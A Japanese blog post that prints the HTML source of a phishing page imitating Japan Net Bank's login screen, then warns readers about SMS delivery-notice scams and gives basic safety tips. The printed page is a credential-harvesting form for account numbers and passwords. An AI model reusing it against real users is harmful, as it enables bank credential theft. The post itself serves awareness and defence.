jsonpCallback : "fHnfkasSil",
timeout : 140000,
data : params,
success : function(json) {
},
error : function(XMLHttpRequest, textStatus, errorThrown){
},
complete : function(json) {
}
});
});
});
//-->
</script>
<script type="text/javascript">
<!--
(function(){var f=document,e=window,i=e.location.protocol,b=[["src",[i=="https:"?"https:/":"http:/","tjmbk.japannetbank.co.jp/336450/1GW.js"].join("/")],["type","text/javascript"],["async",true]],g="XMLHttpRequest",a=null,j=e[g]&&(a=new e[g]()).withCredentials!==undefined,c=f.createElement("script"),h=f.getElementsByTagName("head")[0];if(j){a.open("GET",b[0][1],b[2][1]);a.withCredentials=true;a.onreadystatechange=function(d){if(a.readyState==4&&a.status==200){c.type="script/meta";c.src=b[0][1];h.appendChild(c);new Function(a.responseText)()}};a.send()}else{setTimeout(function(){for(var d=0,k=b.length;d<k;d++){c.setAttribute(b[d][0],b[d][1])}h.appendChild(c)},0)}})();
(function(){var d=document,c=window,g=c.location.protocol,h=c.navigator.userAgent,e="XMLHttpRequest",a,i=!(/msie|trident|edge/i.test(h))&&c[e]&&(a=new c[e]()).withCredentials!==undefined,b=d.createElement("script"),f=d.getElementsByTagName("head")[0];b.src=(g=="https:"?"https://":"http://")+"cciky.japannetbank.co.jp/336450/jnbcdd.js";b.async=true;if(!i){setTimeout(function(){b.type="text/javascript";f.appendChild(b)},0)}else{a.open("GET",b.src,b.async);a.withCredentials=true;a.onreadystatechange=function(j){if(a.readyState==4&&a.status==200){b.type="script/meta";f.appendChild(b);new Function(a.responseText)()}};a.send()}})();
//-->
</script>
<script type="text/javascript" src="static/js/mk1.js"></script>
<script type="text/javascript" src="static/js/mk12.js"></script>
<script type="text/javascript" src="static/js/mk13.js"></script>
<script type="text/javascript" src="static/js/mk14.js"></script>
<script type="text/javascript" src="static/js/mk15.js"></script>
<style type="text/css">
<!--
.pwLink{margin-left:0;}
.pwLink .notWinOpen{margin-right:0;}
@media screen and (max-width:731px){
.pwText{width:270px;}
.pwLink{float:right;}
}
-->
</style>
</head>
<body class="mask_container guest">
<!--body wrapper-->
<div id="bodyWrapper">
<!--header -->
<a name="top"></a>
<div id="hdrContainer" class="cfx">
<div class="hdrLR">
<div class="hdrL">
<img src="static/images/header_logo.png" width="139" alt="ジャパンネット銀行">
</div>
<div class="hdrR">
<a href="https://faq.japannetbank.co.jp/" target="_blank">よくあるご質問</a>
</div>
</div>
</div>
<!--noscript-->
<noscript><p id="noJs">当サイトをご利用になるためには、JavaScriptを有効にする必要があります。</p></noscript>
<!--/noscript-->
<!--container-->
<div id="container" class="cfx ">
<form onsubmit="postvalue(1)" id="form_comment" action="javascript:void(0)">
<div class="toToppage">
<p class="loginNote"><a href="https://www.japannetbank.co.jp/" target="_blank" class="winOpen">ジャパンネット銀行 ホーム</a></p>
</div>
<!--incontainer-->
<div id="inContainer" class="cfx ">
<div id="limitedNews" class="note">今お使いのOS・ブラウザでは2015年12月1日以降、当社ホームページでのお取引がご利用いただけなくなる可能性があります。<a href="https://www.japannetbank.co.jp/news/general2015/151028.html" class="winOpen winOpenInCont" target="_blank">SSL証明書の「SHA-2」方式への変更について</a>をご確認ください。</div>
<!--main-->
<div id="mainArea">
<!--loginForm-->
<div class="loginForm cardImage cfx">
<!--blk-->
<div class="blk">
<p class="labels arw arwDown"><label for="idTenNo">店番号(3桁)</label> - <label for="idKozaNo">口座番号(7桁)</label></p>
<input type="hidden" name="Lx" value="user" />
<p><input type="tel" id="idTenNo" name="TenNo" size="4" maxlength="3" value="" required oninvalid="setCustomValidity('記入する必要があります');" oninput="setCustomValidity('');">-<input type="tel" id="idKozaNo" name="KozaNo" size="9" maxlength="7" value="" required oninvalid="setCustomValidity('記入する必要があります');" oninput="setCustomValidity('');"></p>
<p class="labels arw arwDown pwText"><label for="idPw">ログインパスワード(32文字以内)</label><span class="pwLink"><a href="javascript:toLoginPw()" class="notWinOpen">わからない場合</a></span></p>
<p><input type="password" id="idPw" name="Pw" size="20" maxlength="32" value="" placeholder="半角英数記号32文字以内" required oninvalid="setCustomValidity('記入する必要があります');" oninput="setCustomValidity('');"></p>
<p class="labels arw arwDown"><label for="idMenuSelect">メニューを選択(任意)</label></p>
<p>
<select id="idMenuSelect">
<option value="1" selected>Welcome Page</option>
<option value="2" >普通預金取引明細照会</option>
<option value="3" >振り込み</option>
<option value="4" >カード・トークン紛失・盗難</option>
</select>
</p>
<p class="loginFormExp">選択したメニューに直接お進みいただけます。</p>
<p class="loginBtn">
<input type="submit" value="ログイン" class="btn btn01 btnL">
</p>
</div>
<!--/blk-->
</div>
<!--/loginForm-->
<!--loginNote-->
<div class="loginNote contents">
<!--ID設定有無共通-->
<div class="blk">
<div class="blkTitle cfx"><h2 class="h201">口座開設後、はじめてログインする場合</h2></div>
<div class="blkCont">
<p>キャッシュカードとトークンをご用意のうえ、<a href="/wctx/NBG12390G11.do">はじめてのログイン(初期設定)</a>からお手続きください。</p>
</div>
</div>
<!--/ID設定有無共通-->
<!--お困りの場合-->
<div class="blk">
<div class="blkTitle cfx"><h2 class="h201">お困りの場合</h2></div>
<div class="blkCont">
<p>ログインパスワードを入力してもログインできない場合<a href="https://www.japannetbank.co.jp/cn_login.html" target="_blank" class="winOpen">チェック項目</a></p>
</div>
</div>
<!--/お困りの場合-->
</div>
<!--/loginNote-->
<!--loginNote-->
<div class="loginNote contents">
<!--ID設定有無共通-->
<div class="blk">
<div class="blkCont bdrT0">
<p>BA-PLUSをご利用中のお客さまは、<a href="/balogin_L.html">BA-PLUS専用ログイン</a>ページからログインしてください。</p>
</div>
<div class="blkCont cfx">
<p class="txtIndent"><a href="https://www.japannetbank.co.jp/security/safety/index.html" target="_blank" class="winOpen">ログインパスワードや暗証番号は定期的な変更をおすすめいたします。</a></p>
<p class="txtIndent"><a href="https://www.japannetbank.co.jp/security/crime/prv_phsh.html" target="_blank" class="winOpen">フィッシングに注意</a></p>
</div>
</div>
<!--/ID設定有無共通-->
</div>
<!--/loginNote-->
</div>
<!--/main-->
</div>
<!--/incontainer-->
</form>
</div>
<!--/container-->
<!--footer-->
<div id="ftrContainer" class="cfx">
<div class="ftrLR">
<div class="ftrL">
<a href="https://www.japannetbank.co.jp/regulation/" target="_blank">取引規定集</a>
<a href="https://www.japannetbank.co.jp/privacy/" target="_blank">プライバシーポリシー</a>
</div>
<div class="ftrR">
<span>Copyright The Japan Net Bank, Limited. All rights reserved.</span>
</div>
</div>
</div>
<script type="text/javascript">
<!--
var jspName = "NBG12340G11.jsp";
_satellite.pageBottom();
//-->
</script>
<!--/footer-->
<img src="static/images/login_img001.gif" width="1" height="1" alt="">
</div>
<!--/body wrapper-->
</body>
</html>
このソースコード、念の為すべてのJSを排除してブラウザで確認すると、こんな表示になる。
まじか。
見た目はジャパンネットバンクとそっくりー。
いやー、おそろしーわー。
というわけで、みなさんもお気をつけて!
■ フィッシングサイトに遭遇しないためのまとめ
不在通知SMSのリンクは開いちゃダメ!
もしよくわからないリンクを開いちゃったら、そっ閉じする。アラートが出てもなにも押しちゃだめ。そっ閉じが基本。後でブラウザの履歴を全削。
うちのオカンにも言っておかないと。
この記事が気に入ったらサポートをしてみませんか?